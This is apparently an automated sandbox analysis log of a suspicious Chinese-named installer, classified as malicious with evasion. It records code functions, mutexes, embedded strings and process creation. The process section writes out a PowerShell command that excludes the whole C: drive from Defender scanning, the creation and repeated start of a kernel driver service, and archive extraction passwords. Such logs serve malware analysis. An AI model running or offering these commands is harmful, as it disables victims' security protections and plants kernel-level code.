Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_003FD1D0 10_2_003FD1D0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00417200 10_2_00417200
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_0041D2C0 10_2_0041D2C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_0041F3C0 10_2_0041F3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_003E53F3 10_2_003E53F3
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_003AB3E4 10_2_003AB3E4
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_0040F3A0 10_2_0040F3A0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_003853CF 10_2_003853CF
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_003F7410 10_2_003F7410
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_0041D470 10_2_0041D470
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_0040F420 10_2_0040F420
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_004154D0 10_2_004154D0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_003CD496 10_2_003CD496
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00411550 10_2_00411550
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_003FF500 10_2_003FF500
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00381572 10_2_00381572
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_0042351A 10_2_0042351A
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00413530 10_2_00413530
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_0041F599 10_2_0041F599
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00423601 10_2_00423601
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_003D9652 10_2_003D9652
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_0040D6A0 10_2_0040D6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00399766 10_2_00399766
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_004177C0 10_2_004177C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_003897CA 10_2_003897CA
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_003AF8E0 10_2_003AF8E0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_003FF910 10_2_003FF910
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_0041D9E0 10_2_0041D9E0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00381AA1 10_2_00381AA1
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00407AF0 10_2_00407AF0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_003D3AEF 10_2_003D3AEF
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_0039BAC9 10_2_0039BAC9
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00407C50 10_2_00407C50
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_0039BC92 10_2_0039BC92
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00405E80 10_2_00405E80
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00405F80 10_2_00405F80
Source: C:\Program Files (x86)\Windows NT\7zr.exe Process token adjusted: Security Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: String function: 6CA97240 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: String function: 6CB34F10 appears 415 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: String function: 00381E40 appears 84 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: String function: 003828E3 appears 34 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: String function: 0041FB10 appears 720 times
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.0.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.5.dr Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Static PE information: Number of sections : 11 > 10
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.5.dr Static PE information: Number of sections : 11 > 10
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.0.dr Static PE information: Number of sections : 11 > 10
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, 00000000.00000000.1702203686.00000000002F9000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFileNameSRClient.exe vs #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, 00000000.00000003.1704203075.000000000357E000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFileNameSRClient.exe vs #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, 00000000.00000003.1704613298.000000007F94A000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFileNameSRClient.exe vs #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Binary or memory string: OriginalFileNameSRClient.exe vs #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: tProtect.dll.12.dr Binary string: \Device\TfSysMon
Source: tProtect.dll.12.dr Binary string: \Device\TfKbMonPWLCache
Source: classification engine Classification label: mal80.evad.winEXE@146/32@0/0
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CA64B80 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction, 6_2_6CA64B80
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00389313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle, 10_2_00389313
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00393D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 10_2_00393D66
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00389252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW, 10_2_00389252
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Code function: 6_2_6CA64050 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,Process32NextW, 6_2_6CA64050
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp File created: C:\Program Files (x86)\Windows NT\is-G3Q97.tmp Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:8064:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7144:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7688:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:8156:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:6020:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:2060:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7340:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:3760:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:1456:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7456:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:8020:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:5596:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7384:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7952:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7936:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7800:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7884:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7432:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7788:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:2416:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7596:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7868:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7528:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:1868:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:8132:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7232:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6020:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:8072:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7736:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7544:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7504:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7576:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:8004:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7808:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7672:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:5548:120:WilError_03
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe File created: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp Jump to behavior
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization Jump to behavior
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.dr Binary or memory string: SELECT data FROM %Q.'%q_node' WHERE nodeno=?Node %lld missing from databaseNode %lld is too small (%d bytes)Rtree depth out of range (%d)Node %lld is too small for cell count of %d (%d bytes)Dimension %d of cell %d on node %lld is corruptDimension %d of cell %d on node %lld is corrupt relative to parentwrong number of arguments to function rtreecheck()SELECT * FROM %Q.'%q_rowid'Schema corrupt or not an rtree_rowid_parentENDSELECT count(*) FROM %Q.'%q_%s'cannot open value of type %sno such rowid: %lldforeign keyindexedcannot open virtual table: %scannot open table without rowid: %scannot open view: %sno such column: "%s"cannot open %s column for writingblockDELETE FROM %Q.'%q_data';DELETE FROM %Q.'%q_idx';DELETE FROM %Q.'%q_docsize';version%s_nodedata_shape does not contain a valid polygon
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.dr Binary or memory string: SELECT %s WHERE rowid = ?SELECT rowid, rank FROM %Q.%Q ORDER BY %s("%w"%s%s) %sinvalid rootpageorphan indexsqlite_stat%dDELETE FROM %Q.%s WHERE %s=%QDELETE FROM %Q.sqlite_master WHERE name=%Q AND type='trigger'corrupt schemaUPDATE %Q.sqlite_master SET rootpage=%d WHERE #%d AND rootpage=#%dstattable %s may not be droppeduse DROP TABLE to delete table %suse DROP VIEW to delete view %stblDELETE FROM %Q.sqlite_sequence WHERE name=%QDELETE FROM %Q.sqlite_master WHERE tbl_name=%Q and type!='trigger' UNIQUEindexcannot create a TEMP index on non-TEMP table "%s"table %s may not be indexedviews may not be indexedvirtual tables may not be indexedthere is already a table named %sindex %s already existssqlite_autoindex_%s_%dexpressions prohibited in PRIMARY KEY and UNIQUE constraintsconflicting ON CONFLICT clauses specifiedCREATE%s INDEX %.*sINSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);name='%q' AND type='index'table "%s" has more than one primary keyAUTOINCREMENT is only allowed on an INTEGER PRIMARY KEYTABLEVIEW
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.dr Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe String found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe File read: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe "C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe"
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Process created: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp "C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp" /SL5="$2043A,4740332,845824,C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe"
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process created: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe "C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe Process created: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp "C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp" /SL5="$4043E,4740332,845824,C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe" /VERYSILENT
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Program Files (x86)\Windows NT\7zr.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Program Files (x86)\Windows NT\7zr.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
